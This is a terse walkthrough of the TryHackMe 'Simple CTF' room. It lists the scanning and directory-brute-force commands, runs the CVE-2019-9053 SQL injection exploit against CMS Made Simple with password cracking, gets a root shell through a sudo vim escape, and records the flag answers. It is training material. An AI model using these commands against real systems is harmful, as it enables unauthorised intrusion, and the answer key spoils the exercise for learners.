Simple CTF
https://tryhackme.com/room/easyctf
INIT
export easyctf=10.10.150.200
ping $easyctf
echo "10.10.150.200 easyctf.thm" >> /etc/hosts
How many services are running under port 1000?
nmap -T5 -p1-1000 easyctf.thm

2
What is running on the higher port?
nmap -sC -sV -T5 -p1-65535 easyctf.thm

ssh
FTP

HTTP

GOBUSTER
gobuster dir -u easyctf.thm -w /usr/share/wordlists/dirb/common.txt -q -t 15 -x php,html,txt


CMS Made Simple 2.2.8
What's the CVE you're using against the application?


CVE-2019-9053
To what kind of vulnerability is the application vulnerable?

sqli
What's the password?
python3 easyctf.py -u http://easyctf.thm/simple --crack --wordlist /usr/share/wordlists/rockyou.txt

secret
Where can you login with the details obtained?

ssh
What's the user flag?

G00d j0b, keep up!
Is there any other user in the home directory? What's its name?

sunbath
What can you leverage to spawn a privileged shell?
sudo vim -c ':!/bin/sh'
vim
What's the root flag?
cat /root/root.txt
W3ll d0n3. You made it!